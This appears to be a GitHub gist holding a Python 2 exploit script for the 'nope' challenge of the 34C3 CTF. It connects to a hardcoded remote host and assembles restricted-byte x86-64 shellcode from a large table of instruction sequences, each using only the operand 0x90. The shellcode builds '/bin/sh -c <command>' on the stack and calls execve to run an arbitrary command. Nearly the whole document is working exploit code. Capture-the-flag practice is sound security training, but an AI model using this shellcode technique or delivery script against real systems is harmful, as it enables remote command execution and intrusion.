Skip to content

Instantly share code, notes, and snippets.

@spq

spq/nope.py

Created January 1, 2018 16:18
Show Gist options
  • Save spq/0a5915940ca7d380a0114a549f3b3014 to your computer and use it in GitHub Desktop.
Save spq/0a5915940ca7d380a0114a549f3b3014 to your computer and use it in GitHub Desktop.
Download ZIP
34c3ctf exploits
Raw
nope.py
#!/usr/bin/env python2
import socket
import struct
import telnetlib
import os, sys, time
HOST, PORT = "35.198.126.67", 4444
p32 = lambda v: struct.pack("<I", v)
p64 = lambda v: struct.pack("<Q", v)
s = socket.create_connection((HOST,PORT))
shellcode = """
BITS 64
;rcx contains start of the shellcode
;debug
dbg:
stc
stc
stc
stc
stc
stc
stc
stc
stc
stc
;jc dbg
;end debug
push rcx
pop rsi
jump3:
nop
nop
nop
nop
lodsb
xor al, 0x90
jump2:
jc jump3
add al, 0x90
adc al, 0x90
xor al, 0x90
add al, 0x90
xor al, 0x90
jump1:
jc jump2
add al, 0x90
xor al, 0x90
cmp al,0x90
nop
stc
jnz jump1
found_syscall:
std
lodsb
cld
push rsi
pop rbx
; push strings
mov eax, 0x90909090
xor eax, 0x90909090
;these spots will be overwritten with our argv strings
; command (max 127 chars)
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rsp
pop rcx
; -c
push rax
push rsp
pop rbp
; /bin/sh
push rax
push rsp
pop rdi
push rdi
; write "/bin/sh", 0
; /
mov al, 0x90
add al, 0x90
sbb al, 0x90
or al, 0x90
add al, 0x90
stosb
; b
mov al, 0x90
add al, 0x90
adc al, 0x90
add al, 0x90
adc al, 0x90
add al, 0x90
stosb
; i
mov al, 0x90
add al, 0x90
sbb al, 0x90
sbb al, 0x90
sbb al, 0x90
or al, 0x90
add al, 0x90
sbb al, 0x90
sbb al, 0x90
or al, 0x90
add al, 0x90
sbb al, 0x90
sbb al, 0x90
stosb
; n
mov al, 0x90
stc
sbb al, 0x90
sbb al, 0x90
stosb
; /
mov al, 0x90
add al, 0x90
sbb al, 0x90
or al, 0x90
add al, 0x90
stosb
; s
mov al, 0x90
xor al, 0x90
sub al, 0x90
adc al, 0x90
sub al, 0x90
adc al, 0x90
adc al, 0x90
xor al, 0x90
sub al, 0x90
stosb
; h
mov al, 0x90
stc
adc al, 0x90
adc al, 0x90
stc
adc al, 0x90
adc al, 0x90
stc
adc al, 0x90
adc al, 0x90
xor al, 0x90
sub al, 0x90
adc al, 0x90
adc al, 0x90
xor al, 0x90
stosb
; 0 byte
mov al, 0x90
xor al, 0x90
stosb
; /bin/sh written
; write "-c", 0
; -
mov al, 0x90
xor al, 0x90
sub al, 0x90
sbb al, 0x90
sbb al, 0x90
sub al, 0x90
sbb al, 0x90
stosb
; c
mov al, 0x90
stc
adc al, 0x90
adc al, 0x90
add al, 0x90
adc al, 0x90
add al, 0x90
stosb
; 0 bytes
mov al, 0x90
xor al, 0x90
stosb
stosb
stosb
stosb
stosb
stosb
; write command
;;;;;;;; COMMAND GOES HERE
$$$COMMAND$$$
;;;;;;;;; END OF COMMAND
; 0 byte
mov al, 0x90
xor al, 0x90
stosb
; all strings written
pop rdi ; recover /bin/sh ptr
; write argv pointers
push rax
push rsp
pop rdx ; 0 pointer for envp
push rcx
push rbp
push rdi
push rsp
pop rsi ; argv pointer
; rdi, rsi and rdx initialized
; mov rax, 59
mov eax, 0x90909090
xor eax, 0x90909090
mov al, 0x90
add al, 0x90
sbb al, 0x90
or al, 0x90
stc
sbb al, 0x90
sub al, 0x90
sbb al, 0x90
sbb al, 0x90
sub al, 0x90
sbb al, 0x90
push rbx
ret
"""
shortest_opcodes = {
0x00: "mov xor",
0x01: "mov xor sub adc",
0x02: "mov xor sub adc adc xor",
0x03: "mov xor sub adc adc xor sub adc",
0x04: "mov xor sub adc adc xor sub adc adc xor",
0x05: "mov xor sub adc adc xor sub adc adc xor sub adc",
0x06: "mov stc adc adc stc adc adc add adc add adc or xor",
0x07: "mov stc adc adc stc adc adc stc adc adc add adc or xor",
0x08: "mov add sbb sbb sbb stc sbb sbb stc sbb sbb sub sbb",
0x09: "mov add sbb sbb sbb stc sbb sbb sub sbb sub sbb",
0x0a: "mov add sbb sbb sbb sub sbb sub sbb sub sbb",
0x0b: "mov stc sbb sbb sub sbb sub sbb sub sbb",
0x0c: "mov xor sub sbb sbb sub sbb sub sbb",
0x0d: "mov add sbb or add sbb sbb",
0x0e: "mov add sbb or stc sbb",
0x0f: "mov add sbb or xor",
0x10: "mov xor sub and",
0x11: "mov xor sub and sub adc",
0x12: "mov add sbb and sub adc adc",
0x13: "mov add or add adc add adc add adc",
0x14: "mov add adc add adc add adc add adc",
0x15: "mov stc adc adc add adc add adc add adc",
0x16: "mov stc adc adc stc adc adc add adc add adc",
0x17: "mov stc adc adc stc adc adc stc adc adc add adc",
0x18: "mov stc adc adc stc adc adc stc adc adc stc adc adc",
0x19: "mov add sbb or add sbb sbb sub sbb sbb sub sbb sub sbb",
0x1a: "mov add sbb or stc sbb sub sbb sbb sub sbb sub sbb",
0x1b: "mov add sbb sbb sbb or add sbb sbb or add add",
0x1c: "mov add sbb add sbb sbb sbb or add add",
0x1d: "mov add sbb sbb sbb or add add",
0x1e: "mov add sbb add sbb add",
0x1f: "mov add sbb add",
0x20: "mov add",
0x21: "mov stc adc",
0x22: "mov stc adc adc xor",
0x23: "mov stc adc adc xor sub adc",
0x24: "mov stc adc adc xor sub adc adc xor",
0x25: "mov stc adc adc xor sub adc adc xor sub adc",
0x26: "mov stc adc adc add adc add adc add adc adc or xor",
0x27: "mov stc adc adc stc adc adc add adc add adc adc or xor",
0x28: "mov add sbb add sbb sbb sbb stc sbb sbb stc sbb sbb",
0x29: "mov add sbb sbb sbb stc sbb sbb stc sbb sbb",
0x2a: "mov add sbb sbb sbb stc sbb sbb sub sbb",
0x2b: "mov add sbb sbb sbb sub sbb sub sbb",
0x2c: "mov stc sbb sbb sub sbb sub sbb",
0x2d: "mov xor sub sbb sbb sub sbb",
0x2e: "mov add sbb add sbb or add",
0x2f: "mov add sbb or add",
0x30: "mov xor sub and add add",
0x31: "mov xor sub and stc adc add",
0x32: "mov xor sub and sub adc adc add",
0x33: "mov add sbb and sub adc adc adc add",
0x34: "mov add sbb and sub adc adc adc stc adc",
0x35: "mov add adc add adc add adc add adc adc add",
0x36: "mov stc adc adc add adc add adc add adc adc add",
0x37: "mov stc adc adc stc adc adc add adc add adc adc add",
0x38: "mov stc adc adc stc adc adc stc adc adc add adc adc add",
0x39: "mov add sbb or add sbb sbb stc sbb sbb sbb sub sbb",
0x3a: "mov add sbb or add sbb sbb sub sbb sbb sub sbb",
0x3b: "mov add sbb or stc sbb sub sbb sbb sub sbb",
0x3c: "mov add sbb or xor sub sbb sbb sub sbb",
0x3d: "mov xor sub and sub sbb sbb sub sbb",
0x3e: "mov add sbb add sbb xor add add",
0x3f: "mov add sbb xor add add",
0x40: "mov add or add",
0x41: "mov add adc add",
0x42: "mov stc adc adc add",
0x43: "mov stc adc adc stc adc",
0x44: "mov stc adc adc stc adc adc xor",
0x45: "mov stc adc adc stc adc adc xor sub adc",
0x46: "mov stc adc adc stc adc adc xor sub adc adc xor",
0x47: "mov stc adc adc stc adc adc add adc add adc adc or add",
0x48: "mov add sbb add sbb sbb sbb or add sbb sbb stc sbb sbb",
0x49: "mov add sbb sbb sbb or add sbb sbb stc sbb sbb",
0x4a: "mov add sbb add sbb sbb sbb stc sbb sbb",
0x4b: "mov add sbb sbb sbb stc sbb sbb",
0x4c: "mov add sbb sbb sbb sub sbb",
0x4d: "mov stc sbb sbb sub sbb",
0x4e: "mov xor sub sbb sbb",
0x4f: "mov xor sub sbb xor",
0x50: "mov xor sub xor sub",
0x51: "mov xor sub adc sub xor sub",
0x52: "mov xor sub and stc adc add adc add",
0x53: "mov xor sub and sub adc adc add adc add",
0x54: "mov add sbb and sub adc adc adc add adc add",
0x55: "mov add sbb and sub adc adc adc stc adc adc add",
0x56: "mov add adc add adc add adc add adc adc add adc add",
0x57: "mov stc adc adc add adc add adc add adc adc add adc add",
0x58: "mov add sbb sbb sbb sub sbb sub sbb sub sbb sub sbb sbb",
0x59: "mov stc sbb sbb sub sbb sub sbb sub sbb sub sbb sbb",
0x5a: "mov add sbb or add sbb sbb stc sbb sbb sbb",
0x5b: "mov add sbb or add sbb sbb sub sbb sbb",
0x5c: "mov add sbb or stc sbb sub sbb sbb",
0x5d: "mov add sbb or xor sub sbb sbb",
0x5e: "mov xor sub and sub sbb sbb",
0x5f: "mov add sbb and sub sbb",
0x60: "mov xor sub or xor",
0x61: "mov add or add adc add",
0x62: "mov add adc add adc add",
0x63: "mov stc adc adc add adc add",
0x64: "mov stc adc adc stc adc adc add",
0x65: "mov stc adc adc stc adc adc stc adc",
0x66: "mov stc adc adc stc adc adc stc adc adc xor",
0x67: "mov stc adc adc stc adc adc stc adc adc xor sub adc",
0x68: "mov stc adc adc stc adc adc stc adc adc xor sub adc adc xor",
0x69: "mov add sbb sbb sbb or add sbb sbb or add sbb sbb",
0x6a: "mov add sbb add sbb sbb sbb or add sbb sbb",
0x6b: "mov add sbb sbb sbb or add sbb sbb",
0x6c: "mov add sbb add sbb sbb sbb",
0x6d: "mov add sbb sbb sbb",
0x6e: "mov stc sbb sbb",
0x6f: "mov stc sbb xor",
0x70: "mov xor sub",
0x71: "mov xor sub adc sub",
0x72: "mov xor sub adc adc xor sub",
0x73: "mov xor sub adc sub adc adc xor sub",
0x74: "mov xor sub adc adc xor sub adc adc xor sub",
0x75: "mov add sbb and sub adc adc adc add adc add adc xor",
0x76: "mov add sbb and sub adc adc adc stc adc adc add adc xor",
0x77: "mov add adc add adc add adc add adc adc add adc add adc xor",
0x78: "mov add sbb sbb sbb stc sbb sbb stc sbb sbb sub sbb sub",
0x79: "mov add sbb sbb sbb stc sbb sbb sub sbb sub sbb sub",
0x7a: "mov add sbb sbb sbb sub sbb sub sbb sub sbb sub",
0x7b: "mov add sbb or add sbb sbb stc sbb sbb xor",
0x7c: "mov add sbb or add sbb sbb stc sbb",
0x7d: "mov add sbb or add sbb sbb sub",
0x7e: "mov add sbb or stc sbb sub",
0x7f: "mov add sbb or xor sub",
0x80: "mov add sbb and",
0x81: "mov add sbb and sub adc",
0x82: "mov add or add adc add adc add",
0x83: "mov add adc add adc add adc add",
0x84: "mov stc adc adc add adc add adc add",
0x85: "mov stc adc adc stc adc adc add adc add",
0x86: "mov stc adc adc stc adc adc stc adc adc add",
0x87: "mov stc adc adc stc adc adc stc adc adc stc adc",
0x88: "mov stc adc adc stc adc adc stc adc adc stc adc adc sub",
0x89: "mov add sbb or add sbb sbb sub sbb sbb sub sbb sub sbb sub",
0x8a: "mov add sbb add sbb sbb sbb or add sbb sbb or add",
0x8b: "mov add sbb sbb sbb or add sbb sbb or add",
0x8c: "mov add sbb add sbb sbb sbb or add",
0x8d: "mov add sbb sbb sbb or add",
0x8e: "mov add sbb add sbb",
0x8f: "mov add sbb",
0x90: "mov",
0x91: "mov stc adc sub",
0x92: "mov xor sub adc adc",
0x93: "mov xor sub adc sub adc adc",
0x94: "mov xor sub adc adc xor sub adc adc",
0x95: "mov xor sub adc sub adc adc xor sub adc adc",
0x96: "mov stc adc adc stc adc adc add adc add adc or",
0x97: "mov stc adc adc stc adc adc stc adc adc add adc or",
0x98: "mov add sbb sbb sbb stc sbb sbb stc sbb sbb stc sbb",
0x99: "mov add sbb sbb sbb stc sbb sbb stc sbb sbb sub",
0x9a: "mov add sbb sbb sbb stc sbb sbb sub sbb sub",
0x9b: "mov add sbb sbb sbb sub sbb sub sbb sub",
0x9c: "mov stc sbb sbb sub sbb sub sbb sub",
0x9d: "mov add sbb or add sbb sbb or",
0x9e: "mov add sbb add sbb or",
0x9f: "mov add sbb or",
0xa0: "mov xor sub and add",
0xa1: "mov xor sub and stc adc",
0xa2: "mov xor sub and sub adc adc",
0xa3: "mov add sbb and sub adc adc adc",
0xa4: "mov add or add adc add adc add adc adc",
0xa5: "mov add adc add adc add adc add adc adc",
0xa6: "mov stc adc adc add adc add adc add adc adc",
0xa7: "mov stc adc adc stc adc adc add adc add adc adc",
0xa8: "mov stc adc adc stc adc adc stc adc adc add adc adc",
0xa9: "mov add sbb or add sbb sbb stc sbb sbb sbb sub sbb sub",
0xaa: "mov add sbb or add sbb sbb sub sbb sbb sub sbb sub",
0xab: "mov add sbb or stc sbb sub sbb sbb sub sbb sub",
0xac: "mov add sbb add sbb sbb sbb or add xor add",
0xad: "mov add sbb add sbb xor add add sbb",
0xae: "mov add sbb add sbb xor add",
0xaf: "mov add or add sbb",
0xb0: "mov add or",
0xb1: "mov add adc",
0xb2: "mov stc adc adc",
0xb3: "mov stc adc sub adc adc",
0xb4: "mov stc adc adc xor sub adc adc",
0xb5: "mov stc adc sub adc adc xor sub adc adc",
0xb6: "mov stc adc adc add adc add adc add adc adc or",
0xb7: "mov stc adc adc stc adc adc add adc add adc adc or",
0xb8: "mov add sbb add sbb sbb sbb stc sbb sbb stc sbb sbb or",
0xb9: "mov add sbb add sbb sbb sbb stc sbb sbb stc sbb",
0xba: "mov add sbb sbb sbb stc sbb sbb stc sbb",
0xbb: "mov add sbb sbb sbb stc sbb sbb sub",
0xbc: "mov add sbb sbb sbb sub sbb sub",
0xbd: "mov stc sbb sbb sub sbb sub",
0xbe: "mov xor sub sbb sbb sub",
0xbf: "mov add sbb xor add or",
0xc0: "mov xor sub xor sub sub",
0xc1: "mov xor sub and add add adc",
0xc2: "mov xor sub and stc adc add adc",
0xc3: "mov xor sub and sub adc adc add adc",
0xc4: "mov add sbb and sub adc adc adc add adc",
0xc5: "mov add sbb and sub adc adc adc stc adc adc",
0xc6: "mov add adc add adc add adc add adc adc add adc",
0xc7: "mov stc adc adc add adc add adc add adc adc add adc",
0xc8: "mov stc adc adc stc adc adc add adc add adc adc add adc",
0xc9: "mov add sbb or add sbb sbb stc sbb sbb sbb stc sbb",
0xca: "mov add sbb or add sbb sbb stc sbb sbb sbb sub",
0xcb: "mov add sbb or add sbb sbb sub sbb sbb sub",
0xcc: "mov add sbb or stc sbb sub sbb sbb sub",
0xcd: "mov add sbb or xor sub sbb sbb sub",
0xce: "mov xor sub and sub sbb sbb sub",
0xcf: "mov add sbb and sub sbb sub",
0xd0: "mov add or add or",
0xd1: "mov add or add adc",
0xd2: "mov add adc add adc",
0xd3: "mov stc adc adc add adc",
0xd4: "mov stc adc adc stc adc adc",
0xd5: "mov stc adc sub adc adc stc adc adc",
0xd6: "mov stc adc adc stc adc adc xor sub adc adc",
0xd7: "mov stc adc sub adc adc stc adc adc xor sub adc adc",
0xd8: "mov add sbb add sbb sbb sbb or add sbb sbb stc sbb sbb or",
0xd9: "mov add sbb add sbb sbb sbb or add sbb sbb stc sbb",
0xda: "mov add sbb add sbb sbb sbb stc sbb sbb or",
0xdb: "mov add sbb add sbb sbb sbb stc sbb",
0xdc: "mov add sbb sbb sbb stc sbb",
0xdd: "mov add sbb sbb sbb sub",
0xde: "mov stc sbb sbb sub",
0xdf: "mov xor sub sbb",
0xe0: "mov xor sub sub",
0xe1: "mov xor sub adc sub sub",
0xe2: "mov xor sub adc adc xor sub sub",
0xe3: "mov xor sub adc sub adc adc xor sub sub",
0xe4: "mov xor sub and sub adc adc add adc add adc",
0xe5: "mov add sbb and sub adc adc adc add adc add adc",
0xe6: "mov add sbb and sub adc adc adc stc adc adc add adc",
0xe7: "mov add adc add adc add adc add adc adc add adc add adc",
0xe8: "mov add sbb sbb sbb stc sbb sbb sub sbb sub sbb sub sbb",
0xe9: "mov add sbb sbb sbb sub sbb sub sbb sub sbb sub sbb",
0xea: "mov add sbb or add sbb sbb stc sbb sbb sbb add",
0xeb: "mov add sbb or add sbb sbb stc sbb sbb",
0xec: "mov add sbb or add sbb sbb sub sbb",
0xed: "mov add sbb or stc sbb sub sbb",
0xee: "mov add sbb or xor sub sbb",
0xef: "mov xor sub and sub sbb",
0xf0: "mov xor sub or",
0xf1: "mov xor sub adc sub or",
0xf2: "mov add or add adc add adc",
0xf3: "mov add adc add adc add adc",
0xf4: "mov stc adc adc add adc add adc",
0xf5: "mov stc adc adc stc adc adc add adc",
0xf6: "mov stc adc adc stc adc adc stc adc adc",
0xf7: "mov stc adc sub adc adc stc adc adc stc adc adc",
0xf8: "mov stc adc adc stc adc adc stc adc adc xor sub adc adc",
0xf9: "mov add sbb add sbb sbb sbb or add sbb sbb or add sbb",
0xfa: "mov add sbb add sbb sbb sbb or add sbb sbb or",
0xfb: "mov add sbb add sbb sbb sbb or add sbb",
0xfc: "mov add sbb add sbb sbb sbb or",
0xfd: "mov add sbb add sbb sbb",
0xfe: "mov add sbb sbb",
0xff: "mov stc sbb",
}
def get_asm_for_val(n):
asm = shortest_opcodes[n].split(" ")
res = ""
for c in asm:
if c not in ("stc", "clc"):
c += " al, 0x90"
res += c + "\n"
return res + "stosb\n"
command = sys.argv[1]
open("/tmp/shellcode.tmp.asm","wb").write(shellcode.replace("$$$COMMAND$$$", "\n".join(map(get_asm_for_val, map(ord, command)))))
os.system("nasm -o /dev/stdout /tmp/shellcode.tmp.asm | ndisasm -b 64 - > /tmp/shellcode.tmp.disasm")
shellcode = ""
for l in open("/tmp/shellcode.tmp.disasm").read().split("\n"):
if not l:
continue
l = l[10:]
code = l.split(" ")[0]
mnem = l[len(code):].lstrip(" ")
code = code.decode("hex")
if code[1:].replace("\x90",""):
print "WARN:", code.encode("hex"), mnem
shellcode += code[0]
s.sendall(shellcode)
s.shutdown(socket.SHUT_WR)
while 1:
d = s.recv(4096)
if not d:
break
sys.stdout.write(d)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment